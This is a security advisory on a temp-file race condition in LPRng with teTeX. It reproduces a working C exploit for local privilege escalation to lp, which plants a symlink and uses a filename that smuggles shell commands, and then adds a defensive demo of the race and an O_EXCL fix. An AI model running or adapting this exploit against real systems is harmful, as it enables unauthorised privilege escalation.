COMMAND

    LPRng

SYSTEMS AFFECTED

    LPRng-3.7.4-23 (and earlier) + tetex-1.0.7-7 (and earlier?)

PROBLEM

    zen-parse@gmx.net found the following. If the tetex package and
    LPRng are both installed, there is an exploitable race condition
    on a temporary file that allows elevation of privileges.

    It is fixed in Rawhide, but that does not really help people who
    just use the provided up2date program to keep themselves secure.

    /********************************************************************
    Redhat Bugzilla reference:-
    
    https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43342
    
     --zen-parse
    
    important info about this exploit:
    
     requires some fonts get made when it's run.
     probably won't be a problem unless someone
     else has tried this exploit.
     just wait 90 days for /var/lib/texmf to clear
     and try again ;]
     or try printing something different
     .dvi files are what does the trick.
    
    ********************************************************************/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>

    /* Returns the fifth field of /proc/loadavg, the PID most recently
     * assigned by the kernel, as a guess at the PID (and so the
     * lsR<pid>.tmp name) the next texmf helper will use. */
    int shake()
    {
     FILE *f;
     char r[1000];
     int w;
     f=fopen("/proc/loadavg","r");
     fscanf(f,"%*s %*s %*s %*s %s",r);
     fclose(f);
     w=atoi(r);
     return w;
    }

    /* Builds the predictable temp directory (s) and temp file (t) paths
     * for a guessed PID ofs. */
    void cow(char *s,char *t,int ofs)
    {
     sprintf(s,"/var/lib/texmf/lsR%d.tmp",ofs);
     sprintf(t,"%s/lsR%d.tmp",s,ofs);
    }
    
    int main()
    {
     char s[1000];
     char t[1000];
     int y,i;
     printf("Put the stuff to run as lp:lp in /tmp/hax\n");
     printf("the lpr /usr/share/aspe<tab>/manual.dvi\n");
     printf("when the ! comes up, wait a second, then press control-C.\n\n");
     printf("Then print something.\n\n\n");
     /* Create a file whose name is a series of newline-separated shell
      * lines; 65 in the original is O_WRONLY|O_CREAT. */
     close(open("/var/lib/texmf/cd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd tmp\nexport PATH=.\nhax\nexit 0",O_WRONLY|O_CREAT,0666));
     /* Poll for the temp file under the guessed names; when it appears,
      * replace it with a symlink to the lp spool's postscript.cfg. */
     while(1)
     {
      i=shake();
      for(y=-30;y<0;y++)
      {
       cow(s,t,y+i);
       if(!access(t,0))
       {
        printf("!\n");
        unlink(t);
        symlink("/var/spool/lpd/lp/postscript.cfg",t);
        sleep(1);
       }
      }
     }
     return 0;
    }
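    The flaw the exploit above depends on is a classic time-of-check/time-of-use
    race: a temp file with a name anyone can predict (lsR<pid>.tmp), an
    existence check, then a plain open() that follows whatever symlink was
    planted in between. The following is an added illustration, not code from
    zen-parse, Red Hat, LPRng or teTeX: it reproduces that pattern in a scratch
    directory under /tmp with a constructed "postscript.cfg" stand-in, and sets
    it beside the hardened form that uses O_CREAT|O_EXCL|O_NOFOLLOW so the
    planted link is refused instead of followed. The hook callback, the
    directory layout and the function names are all assumptions made for the
    demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hook run between the existence check and the open(): it stands in for
 * whatever a second process manages to do inside that TOCTOU window. */
typedef void (*window_hook)(const char *path, void *ctx);

/* Racy pattern, modelled on the lsR<pid>.tmp naming from the advisory:
 * a name anyone can predict, an access() check, then a plain open() that
 * follows a symlink planted after the check. */
int racy_tmp_open(const char *dir, char *path, size_t len,
                  window_hook hook, void *ctx)
{
    snprintf(path, len, "%s/lsR%d.tmp", dir, (int)getpid());
    if (access(path, F_OK) == 0)
        return -1;                      /* "nothing there yet", for now */
    if (hook)
        hook(path, ctx);                /* the window */
    return open(path, O_WRONLY | O_CREAT, 0644);
}

/* Hardened pattern: same directory, same predictable name, but
 * O_CREAT|O_EXCL makes creation atomic and fails on any pre-existing
 * entry (a symlink included); O_NOFOLLOW is a second line of defence. */
int hardened_tmp_open(const char *dir, char *path, size_t len,
                      window_hook hook, void *ctx)
{
    snprintf(path, len, "%s/lsR%d.tmp", dir, (int)getpid());
    if (hook)
        hook(path, ctx);                /* same window, now harmless */
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Hook that plants a symlink at the temp path, pointing at the file we
 * want protected (the constructed stand-in for postscript.cfg). */
static void plant_symlink(const char *path, void *ctx)
{
    symlink((const char *)ctx, path);
}

/* Reads up to len-1 bytes of a file into buf; returns bytes read or -1. */
static ssize_t read_file(const char *path, char *buf, size_t len)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, len - 1);
    close(fd);
    if (n >= 0)
        buf[n] = '\0';
    return n;
}

/* Runs both patterns in a scratch directory under /tmp (constructed setup,
 * not a real spool). Returns 1 if the racy open wrote through the planted
 * link and the hardened open refused to create the file, 0 otherwise. */
int demo(void)
{
    char dir[] = "/tmp/lsR-demo.XXXXXX";
    char target[4096], path[4096], buf[32];
    int racy_followed = 0, hardened_refused = 0, fd;

    if (!mkdtemp(dir))
        return 0;
    snprintf(target, sizeof target, "%s/postscript.cfg", dir);
    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return 0;
    (void)write(fd, "original\n", 9);
    close(fd);

    fd = racy_tmp_open(dir, path, sizeof path, plant_symlink, target);
    if (fd >= 0) {
        (void)write(fd, "clobbered\n", 10);     /* lands in postscript.cfg */
        close(fd);
        if (read_file(target, buf, sizeof buf) > 0)
            racy_followed = strncmp(buf, "clobbered", 9) == 0;
    }
    unlink(path);                /* reset so the hardened run sees the same fresh window */

    fd = hardened_tmp_open(dir, path, sizeof path, plant_symlink, target);
    hardened_refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
    if (fd >= 0)
        close(fd);

    unlink(path);
    unlink(target);
    rmdir(dir);
    return racy_followed && hardened_refused;
}

int main(void)
{
    puts(demo() ? "racy open followed the planted link; hardened open refused"
                : "unexpected result (is /tmp writable?)");
    return 0;
}
```

    The hardened variant still uses a predictable name on purpose, to show that
    O_EXCL alone closes the window; in real code the name should also be
    unpredictable (mkstemp or equivalent) and the directory should not be
    writable by untrusted users, so that neither the link-planting nor the
    PID-guessing step of the exploit has anything to work with.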

SOLUTION

    Nothing yet.